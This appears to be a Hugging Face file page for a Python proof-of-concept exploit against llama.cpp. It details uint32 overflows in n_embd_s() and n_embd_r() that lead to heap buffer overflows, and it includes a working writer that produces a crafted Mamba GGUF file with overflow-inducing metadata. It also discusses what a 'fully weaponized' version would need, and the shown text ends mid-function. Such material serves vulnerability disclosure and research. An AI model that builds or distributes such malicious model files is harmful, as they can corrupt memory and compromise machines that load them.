Upload poc_hparams_overflow.py with huggingface_hub
Browse files- poc_hparams_overflow.py +620 -0
poc_hparams_overflow.py
ADDED
|
@@ -0,0 +1,620 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
PoC: uint32_t integer overflow in llama_hparams::n_embd_s() and n_embd_r()
|
| 4 |
+
=====================================================================================
|
| 5 |
+
|
| 6 |
+
VULNERABILITY SUMMARY:
|
| 7 |
+
In llama.cpp, the functions n_embd_s() and n_embd_r() in src/llama-hparams.cpp
|
| 8 |
+
compute recurrent state buffer sizes using uint32_t arithmetic. When the product
|
| 9 |
+
of attacker-controlled GGUF metadata values exceeds 2^32, silent integer overflow
|
| 10 |
+
causes allocation of undersized buffers. Subsequent writes to these buffers during
|
| 11 |
+
inference cause heap buffer overflow.
|
| 12 |
+
|
| 13 |
+
AFFECTED FUNCTIONS (src/llama-hparams.cpp):
|
| 14 |
+
1. n_embd_s() line 158: return n_embd * wkv_head_size; [RWKV6/RWKV7]
|
| 15 |
+
2. n_embd_s() line 169: return ssm_d_state * ssm_d_inner; [Mamba/Mamba2]
|
| 16 |
+
3. n_embd_s() line 165: return n_embd_head_kda * n_embd_head_kda * n_head(); [Kimi KDA]
|
| 17 |
+
4. n_embd_r() line 134: return token_shift_count * n_embd; [RWKV6/RWKV7]
|
| 18 |
+
5. n_embd_r() line 139: return n_embd * (n_shortconv_l_cache-1); [LFM2]
|
| 19 |
+
6. n_embd_r() line 152: return (ssm_d_conv-1) * (ssm_d_inner + 2*ssm_n_group*ssm_d_state); [Mamba]
|
| 20 |
+
|
| 21 |
+
ALLOCATION SITE (src/llama-memory-recurrent.cpp lines 94-95):
|
| 22 |
+
ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
|
| 23 |
+
ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);
|
| 24 |
+
|
| 25 |
+
Note: n_embd_r() returns uint32_t, mem_size is uint32_t, so the multiplication
|
| 26 |
+
hparams.n_embd_r()*mem_size is ALSO in uint32_t and may overflow again before
|
| 27 |
+
being widened to int64_t for ggml_new_tensor_1d.
|
| 28 |
+
|
| 29 |
+
NO INPUT VALIDATION:
|
| 30 |
+
There are no range checks on wkv_head_size, ssm_d_state, ssm_d_inner,
|
| 31 |
+
n_shortconv_l_cache, n_embd_head_kda, or token_shift_count. Values are read
|
| 32 |
+
directly from untrusted GGUF metadata into uint32_t fields.
|
| 33 |
+
|
| 34 |
+
TRIGGER SEQUENCE:
|
| 35 |
+
1. llama_load_model_from_file() -> load_hparams() reads overflow-inducing values
|
| 36 |
+
2. load_tensors() loads model weights (tensors sized with int64_t, no overflow there)
|
| 37 |
+
3. llama_new_context_with_model() -> create_memory() -> llama_memory_recurrent()
|
| 38 |
+
calls n_embd_s() / n_embd_r() with uint32_t overflow -> undersized allocation
|
| 39 |
+
4. During inference, recurrent state is written into the undersized buffer -> HEAP OOB
|
| 40 |
+
|
| 41 |
+
ASAN DETECTION:
|
| 42 |
+
Yes, ASan would detect the heap-buffer-overflow during inference when the recurrent
|
| 43 |
+
state write exceeds the allocated buffer. The overflow at step 3 is silent (no UB
|
| 44 |
+
in C/C++ for unsigned wrap-around), but the resulting OOB write at step 4 is
|
| 45 |
+
detected by ASan.
|
| 46 |
+
|
| 47 |
+
This script generates a minimal GGUF file demonstrating the vulnerability.
|
| 48 |
+
"""
|
| 49 |
+
|
| 50 |
+
import struct
|
| 51 |
+
import sys
|
| 52 |
+
import os
|
| 53 |
+
import numpy as np
|
| 54 |
+
|
| 55 |
+
# --------------------------------------------------------------------------
|
| 56 |
+
# Constants from GGUF specification
|
| 57 |
+
# --------------------------------------------------------------------------
|
| 58 |
+
GGUF_MAGIC = 0x46554747 # "GGUF" as uint32 little-endian (bytes: 47 47 55 46)
|
| 59 |
+
GGUF_VERSION = 3
|
| 60 |
+
|
| 61 |
+
# GGUF value types
|
| 62 |
+
GGUF_TYPE_UINT32 = 4
|
| 63 |
+
GGUF_TYPE_FLOAT32 = 6
|
| 64 |
+
GGUF_TYPE_STRING = 8
|
| 65 |
+
GGUF_TYPE_ARRAY = 9
|
| 66 |
+
GGUF_TYPE_UINT8 = 0
|
| 67 |
+
|
| 68 |
+
# GGML tensor types
|
| 69 |
+
GGML_TYPE_F32 = 0
|
| 70 |
+
|
| 71 |
+
UINT32_MAX = 0xFFFFFFFF
|
| 72 |
+
|
| 73 |
+
|
| 74 |
+
def uint32_overflow(val):
    """Model C uint32_t wrap-around: reduce val modulo 2**32."""
    # Equivalent to masking with 0xFFFFFFFF for the non-negative inputs used here.
    return val % 0x1_0000_0000
|
| 77 |
+
|
| 78 |
+
|
| 79 |
+
def analyze_overflow_scenarios():
    """Print analysis of all overflow scenarios.

    Each scenario pairs the mathematically correct product with its uint32_t
    wrap-around value to show how badly the allocation is undersized.
    Fix applied: removed the unused local ``subexpr`` (its value was already
    computed as ``overflowed_sub`` below and never read).
    """
    print("=" * 78)
    print("OVERFLOW ANALYSIS FOR ALL VULNERABLE FUNCTIONS")
    print("=" * 78)

    # --- Scenario 1: RWKV6 n_embd_s() ---
    print("\n--- Scenario 1: RWKV6 n_embd_s() = n_embd * wkv_head_size ---")
    n_embd = 65537
    wkv_head_size = 65537
    correct = n_embd * wkv_head_size
    overflowed = uint32_overflow(correct)
    print(f" n_embd = {n_embd}")
    print(f" wkv_head_size = {wkv_head_size}")
    print(f" Correct product = {correct} (0x{correct:X})")
    print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
    print(f" Ratio = {correct / overflowed:.1f}x undersized")
    print(f" Correct buffer (1 seq, f32) = {correct * 4 / (1024**2):.1f} MiB")
    print(f" Overflow buffer (1 seq, f32) = {overflowed * 4 / (1024**2):.1f} MiB")

    # --- Scenario 2: Mamba n_embd_s() ---
    print("\n--- Scenario 2: Mamba n_embd_s() = ssm_d_state * ssm_d_inner ---")
    n_embd_mamba = 2
    ssm_d_inner = 2 * n_embd_mamba  # constraint: d_inner = 2 * n_embd
    ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2  # just enough to overflow
    correct = ssm_d_state * ssm_d_inner
    overflowed = uint32_overflow(correct)
    print(f" n_embd = {n_embd_mamba}")
    print(f" ssm_d_inner = {ssm_d_inner} (= 2 * n_embd)")
    print(f" ssm_d_state = {ssm_d_state}")
    print(f" Correct product = {correct} (0x{correct:X})")
    print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
    # max() guards against division by zero when the product wraps exactly to 0
    print(f" Ratio = {correct / max(overflowed, 1):.1f}x undersized")

    # --- Scenario 3: Kimi KDA n_embd_s() ---
    print("\n--- Scenario 3: Kimi KDA n_embd_s() = n_embd_head_kda^2 * n_head ---")
    n_embd_head_kda = 11586  # 11586^2 * 32 > 2^32
    n_head = 32
    correct = n_embd_head_kda * n_embd_head_kda * n_head
    overflowed = uint32_overflow(correct)
    print(f" n_embd_head_kda = {n_embd_head_kda}")
    print(f" n_head = {n_head}")
    print(f" Correct product = {correct} (0x{correct:X})")
    print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
    if overflowed > 0:
        print(f" Ratio = {correct / overflowed:.1f}x undersized")
    else:
        print(f" Wraps to ZERO -- ggml_new_tensor_1d with size 0!")

    # --- Scenario 4: LFM2 n_embd_r() ---
    print("\n--- Scenario 4: LFM2 n_embd_r() = n_embd * (n_shortconv_l_cache - 1) ---")
    n_embd_lfm = 4096
    n_shortconv_l_cache = 1048578  # n_embd * (1048578-1) = 4096 * 1048577 > 2^32
    correct = n_embd_lfm * (n_shortconv_l_cache - 1)
    overflowed = uint32_overflow(correct)
    print(f" n_embd = {n_embd_lfm}")
    print(f" n_shortconv_l_cache = {n_shortconv_l_cache}")
    print(f" Correct product = {correct} (0x{correct:X})")
    print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
    print(f" Ratio = {correct / overflowed:.1f}x undersized")

    # --- Scenario 5: Mamba n_embd_r() complex ---
    print("\n--- Scenario 5: Mamba n_embd_r() = (d_conv-1)*(d_inner + 2*n_group*d_state) ---")
    ssm_d_conv = 5
    ssm_d_inner_r = 512
    ssm_n_group = 32768
    ssm_d_state_r = 32769
    correct_sub = ssm_d_inner_r + 2 * ssm_n_group * ssm_d_state_r
    correct = (ssm_d_conv - 1) * correct_sub
    # Mirror the C expression: every intermediate wraps in uint32_t
    overflowed_sub = uint32_overflow(2 * ssm_n_group * ssm_d_state_r)
    overflowed = uint32_overflow((ssm_d_conv - 1) * uint32_overflow(ssm_d_inner_r + overflowed_sub))
    print(f" ssm_d_conv = {ssm_d_conv}")
    print(f" ssm_d_inner = {ssm_d_inner_r}")
    print(f" ssm_n_group = {ssm_n_group}")
    print(f" ssm_d_state = {ssm_d_state_r}")
    print(f" 2*n_group*d_state = {2*ssm_n_group*ssm_d_state_r} (correct)")
    print(f" 2*n_group*d_state = {overflowed_sub} (uint32 overflow)")
    print(f" Full correct = {correct}")
    print(f" Full overflowed = {overflowed}")

    # --- Scenario 6: Double overflow at allocation site ---
    print("\n--- Scenario 6: Double overflow at allocation site (line 94-95) ---")
    print(" Even if n_embd_s() doesn't overflow, the multiplication")
    print(" n_embd_s() * mem_size on line 95 is ALSO in uint32_t!")
    n_embd_s_val = 65536  # legitimate n_embd_s value
    mem_size = 65537
    correct = n_embd_s_val * mem_size
    overflowed = uint32_overflow(correct)
    print(f" n_embd_s() = {n_embd_s_val}")
    print(f" mem_size = {mem_size}")
    print(f" Correct = {correct} (0x{correct:X})")
    print(f" Overflowed = {overflowed} (0x{overflowed:X})")
    print(f" Ratio = {correct / max(overflowed, 1):.1f}x undersized")

    print("\n" + "=" * 78)
|
| 175 |
+
|
| 176 |
+
|
| 177 |
+
# --------------------------------------------------------------------------
|
| 178 |
+
# GGUF binary writer (minimal, hand-crafted)
|
| 179 |
+
# --------------------------------------------------------------------------
|
| 180 |
+
def write_gguf_string(f, s):
    """Serialize a GGUF string to *f*: uint64 LE byte length, then raw UTF-8.

    No NUL terminator is written — the GGUF format is length-prefixed.
    """
    payload = s.encode('utf-8')
    length_prefix = struct.pack('<Q', len(payload))
    f.write(length_prefix)
    f.write(payload)
|
| 185 |
+
|
| 186 |
+
|
| 187 |
+
def write_gguf_kv_string(f, key, value):
    """Emit one GGUF KV entry whose value is a UTF-8 string.

    Layout: key string, uint32 type tag, value string. The string writer
    is inlined here (length-prefixed UTF-8, no terminator).
    """
    raw_key = key.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_key)))
    f.write(raw_key)
    f.write(struct.pack('<I', 8))  # 8 == GGUF_TYPE_STRING
    raw_val = value.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_val)))
    f.write(raw_val)
|
| 192 |
+
|
| 193 |
+
|
| 194 |
+
def write_gguf_kv_uint32(f, key, value):
    """Emit one GGUF KV entry holding a single uint32 value."""
    raw_key = key.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_key)))
    f.write(raw_key)
    # Type tag (4 == GGUF_TYPE_UINT32) immediately followed by the payload.
    f.write(struct.pack('<II', 4, value))
|
| 199 |
+
|
| 200 |
+
|
| 201 |
+
def write_gguf_kv_float32(f, key, value):
    """Emit one GGUF KV entry holding a single IEEE-754 float32."""
    raw_key = key.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_key)))
    f.write(raw_key)
    f.write(struct.pack('<I', 6))  # 6 == GGUF_TYPE_FLOAT32
    f.write(struct.pack('<f', value))
|
| 206 |
+
|
| 207 |
+
|
| 208 |
+
def write_gguf_kv_string_array(f, key, values):
    """Emit one GGUF KV entry holding an array of UTF-8 strings.

    Layout: key string, array tag, element type tag, uint64 count,
    then each element as a length-prefixed string.
    """
    raw_key = key.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_key)))
    f.write(raw_key)
    f.write(struct.pack('<I', 9))  # 9 == GGUF_TYPE_ARRAY
    f.write(struct.pack('<I', 8))  # element type: 8 == GGUF_TYPE_STRING
    f.write(struct.pack('<Q', len(values)))
    for item in values:
        raw = item.encode('utf-8')
        f.write(struct.pack('<Q', len(raw)))
        f.write(raw)
|
| 216 |
+
|
| 217 |
+
|
| 218 |
+
def write_gguf_kv_float32_array(f, key, values):
    """Emit one GGUF KV entry holding an array of float32 values."""
    raw_key = key.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_key)))
    f.write(raw_key)
    f.write(struct.pack('<I', 9))  # 9 == GGUF_TYPE_ARRAY
    f.write(struct.pack('<I', 6))  # element type: 6 == GGUF_TYPE_FLOAT32
    f.write(struct.pack('<Q', len(values)))
    for item in values:
        f.write(struct.pack('<f', item))
|
| 226 |
+
|
| 227 |
+
|
| 228 |
+
def write_gguf_kv_int32_array(f, key, values):
    """Emit one GGUF KV entry holding an array of int32 values.

    Fix: the original wrote element type GGUF_TYPE_UINT32 (4) and packed each
    element with unsigned '<I', contradicting the function name, its docstring,
    and its use for tokenizer.ggml.token_type (an int32 array per the GGUF
    convention). Negative token types would also have raised struct.error.
    We now write the GGUF int32 type id (5) and pack signed values.
    """
    raw_key = key.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_key)))
    f.write(raw_key)
    f.write(struct.pack('<I', 9))  # 9 == GGUF_TYPE_ARRAY
    f.write(struct.pack('<I', 5))  # element type: 5 == GGUF_TYPE_INT32 (signed)
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<i', v))
|
| 236 |
+
|
| 237 |
+
|
| 238 |
+
def write_tensor_info(f, name, ndims, shape, dtype):
    """Serialize one tensor-info record for the GGUF header.

    Layout: name string, uint32 ndims, one uint64 per dimension, uint32 dtype,
    uint64 data offset. The offset written here is always 0 (valid for the
    first tensor; cumulative offsets for later tensors are not handled).
    """
    raw_name = name.encode('utf-8')
    f.write(struct.pack('<Q', len(raw_name)))
    f.write(raw_name)
    f.write(struct.pack('<I', ndims))
    for extent in shape:
        f.write(struct.pack('<Q', extent))
    f.write(struct.pack('<I', dtype))
    f.write(struct.pack('<Q', 0))
|
| 246 |
+
|
| 247 |
+
|
| 248 |
+
def generate_mamba_poc_gguf(output_path):
    """
    Generate a minimal GGUF file targeting the Mamba architecture with
    ssm_d_state and ssm_d_inner values chosen to overflow n_embd_s().

    Due to the constraint d_inner = 2*n_embd and the fact that ssm_d_state
    appears directly in tensor dimensions (ssm_a: {d_state, d_inner}),
    a fully loadable PoC requires large tensors (~16GB+). This PoC creates
    a structurally valid GGUF header demonstrating the overflow parameters.
    Tensor data is provided as minimal stubs.

    For a fully weaponized exploit, one would need to provide correctly-sized
    tensor data, which is feasible (many real models are 16GB+) but impractical
    for a PoC demonstration.
    """
    # Overflow parameters for Mamba n_embd_s()
    n_embd = 2
    n_vocab = 4
    n_layer = 1
    ssm_d_inner = 2 * n_embd  # = 4 (required: d_inner == 2*n_embd)
    ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2  # 1073741825
    ssm_d_conv = 4
    ssm_dt_rank = 1

    # d_state * d_inner exceeds 2^32, so the C-side uint32 product wraps.
    correct_n_embd_s = ssm_d_state * ssm_d_inner
    overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)

    print(f"\n{'='*78}")
    print("GENERATING MAMBA PoC GGUF FILE")
    print(f"{'='*78}")
    print(f" Architecture: mamba")
    print(f" n_embd: {n_embd}")
    print(f" n_layer: {n_layer}")
    print(f" ssm_d_inner: {ssm_d_inner}")
    print(f" ssm_d_state: {ssm_d_state}")
    print(f" ssm_d_conv: {ssm_d_conv}")
    print(f" ssm_dt_rank: {ssm_dt_rank}")
    print(f"")
    print(f" n_embd_s() CORRECT value: {correct_n_embd_s}")
    print(f" n_embd_s() OVERFLOWED value: {overflowed_n_embd_s}")
    print(f" Allocated buffer is {correct_n_embd_s / max(overflowed_n_embd_s, 1):.0f}x too small!")
    print(f"")
    print(f" n_embd_r() = (d_conv-1) * d_inner = {(ssm_d_conv-1) * ssm_d_inner}")
    print(f" (n_embd_r does not overflow with these params)")
    print()

    # Define tensors needed for Mamba (per llama-arch.cpp lines 1351-1364)
    # NOTE: Tensor shapes include d_state which makes them very large.
    # We provide minimal stub data to demonstrate the GGUF structure.
    tensors = []
    tensor_data_list = []

    def add_tensor(name, shape):
        # Record a tensor's declared shape plus a tiny stub payload:
        # the header advertises the full shape, the data section does not.
        n_elements = 1
        for d in shape:
            n_elements *= d
        data = np.zeros(min(n_elements, 64), dtype=np.float32)  # stub: only first 64 elements
        tensors.append((name, len(shape), shape, GGML_TYPE_F32))
        tensor_data_list.append(data)

    # Global tensors
    add_tensor("token_embd.weight", [n_embd, n_vocab])
    add_tensor("output_norm.weight", [n_embd])
    add_tensor("output.weight", [n_embd, n_vocab])

    # Per-layer tensors (1 layer)
    for i in range(n_layer):
        add_tensor(f"blk.{i}.attn_norm.weight", [n_embd])
        add_tensor(f"blk.{i}.ssm_in.weight", [n_embd, 2 * ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_conv1d.weight", [ssm_d_conv, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_conv1d.bias", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_x.weight", [ssm_d_inner, ssm_dt_rank + 2 * ssm_d_state])
        add_tensor(f"blk.{i}.ssm_dt.weight", [ssm_dt_rank, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_dt.bias", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_a", [ssm_d_state, ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_d", [ssm_d_inner])
        add_tensor(f"blk.{i}.ssm_out.weight", [ssm_d_inner, n_embd])

    # KV pairs for GGUF metadata
    # NOTE(review): kv_pairs and this initial n_kv = 0 are never used —
    # the KV entries are written directly below and n_kv is reassigned.
    kv_pairs = []
    n_kv = 0

    # Write GGUF file
    with open(output_path, 'wb') as f:
        # We'll write the header later once we know the structure
        # NOTE(review): header_pos is unused; the header is in fact written
        # immediately below, not deferred.
        header_pos = f.tell()

        # Count KV pairs
        # We need: general.architecture, general.name,
        # mamba.context_length, mamba.embedding_length, mamba.block_count,
        # mamba.ssm.conv_kernel, mamba.ssm.inner_size, mamba.ssm.state_size,
        # mamba.ssm.time_step_rank, mamba.attention.layer_norm_rms_epsilon,
        # tokenizer.ggml.model, tokenizer.ggml.tokens, tokenizer.ggml.scores,
        # tokenizer.ggml.token_type
        n_kv = 14
        n_tensors = len(tensors)

        # GGUF header
        f.write(struct.pack('<I', GGUF_MAGIC))
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # KV data
        write_gguf_kv_string(f, "general.architecture", "mamba")
        write_gguf_kv_string(f, "general.name", "overflow-poc-mamba")
        write_gguf_kv_uint32(f, "mamba.context_length", 2048)
        write_gguf_kv_uint32(f, "mamba.embedding_length", n_embd)
        write_gguf_kv_uint32(f, "mamba.block_count", n_layer)
        write_gguf_kv_uint32(f, "mamba.ssm.conv_kernel", ssm_d_conv)
        write_gguf_kv_uint32(f, "mamba.ssm.inner_size", ssm_d_inner)
        write_gguf_kv_uint32(f, "mamba.ssm.state_size", ssm_d_state)
        write_gguf_kv_uint32(f, "mamba.ssm.time_step_rank", ssm_dt_rank)
        write_gguf_kv_float32(f, "mamba.attention.layer_norm_rms_epsilon", 1e-5)

        # Minimal tokenizer
        write_gguf_kv_string(f, "tokenizer.ggml.model", "gpt2")
        tokens = ["<pad>", "<eos>", "a", "b"]
        write_gguf_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
        write_gguf_kv_float32_array(f, "tokenizer.ggml.scores", [0.0] * len(tokens))
        write_gguf_kv_int32_array(f, "tokenizer.ggml.token_type", [0] * len(tokens))

        # Tensor info
        # NOTE: We write the correct shapes (which are very large for ssm_a, ssm_x)
        # but only provide stub data. This makes the file small but structurally valid.
        # A real exploit would need to provide full tensor data.
        data_offset = 0
        for name, ndims, shape, dtype in tensors:
            write_gguf_string(f, name)
            f.write(struct.pack('<I', ndims))
            for dim in shape:
                f.write(struct.pack('<Q', dim))
            f.write(struct.pack('<I', dtype))
            f.write(struct.pack('<Q', data_offset))
            # Calculate actual data size for this tensor
            # (matches the stub truncation in add_tensor: at most 64 elements)
            n_elements = 1
            for d in shape:
                n_elements *= d
            data_size = min(n_elements, 64) * 4  # f32 = 4 bytes, but we only store stub
            # Align to 32 bytes
            aligned_size = (data_size + 31) & ~31
            data_offset += aligned_size

        # Align to data alignment boundary (default 32)
        current_pos = f.tell()
        alignment = 32
        padding = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding)

        # Tensor data (stubs)
        for data in tensor_data_list:
            f.write(data.tobytes())
            # Pad to 32-byte alignment
            data_size = len(data) * 4
            pad = (alignment - (data_size % alignment)) % alignment
            f.write(b'\x00' * pad)

    file_size = os.path.getsize(output_path)
    print(f" Output: {output_path}")
    print(f" File size: {file_size} bytes ({file_size/1024:.1f} KiB)")
    print()
    print(" NOTE: This GGUF file has correct overflow-inducing metadata but")
    print(" truncated tensor data. The hparams will parse correctly and the")
    print(" overflow will compute during context creation, but tensor loading")
    print(" will fail due to insufficient data. A full exploit requires ~16GB")
    print(" of tensor data (realistic for real model files).")
    print()
    return output_path
|
| 416 |
+
|
| 417 |
+
|
| 418 |
+
def generate_rwkv6_poc_gguf(output_path):
    """
    Generate a minimal GGUF targeting RWKV6 architecture.
    n_embd_s() = n_embd * wkv_head_size overflows to small value.

    For RWKV6, wkv_head_size appears in tensor shape {head_size, n_embd/head_size},
    requiring n_embd >= wkv_head_size. The minimum overflow case is:
    n_embd = 65537, wkv_head_size = 65537
    n_embd_s() = 65537 * 65537 = 4295098369 -> wraps to 131073 in uint32

    However, tensors like time_mix_key {n_embd, n_embd} = {65537, 65537} require
    ~16GB, making a compact PoC file impractical.

    NOTE(review): despite the name, this function only PRINTS the analysis;
    no GGUF file is produced and ``output_path`` is never read (the caller
    passes None).
    """
    n_embd = 65537
    wkv_head_size = 65537
    # NOTE(review): n_layer, n_vocab, time_mix_extra_dim, time_decay_extra_dim
    # and ffn_size are illustrative parameters; only n_embd/n_vocab/
    # wkv_head_size are actually referenced in the prints below.
    n_layer = 1
    n_vocab = 4
    time_mix_extra_dim = 32
    time_decay_extra_dim = 64
    ffn_size = 4  # minimal feed-forward size

    correct_n_embd_s = n_embd * wkv_head_size
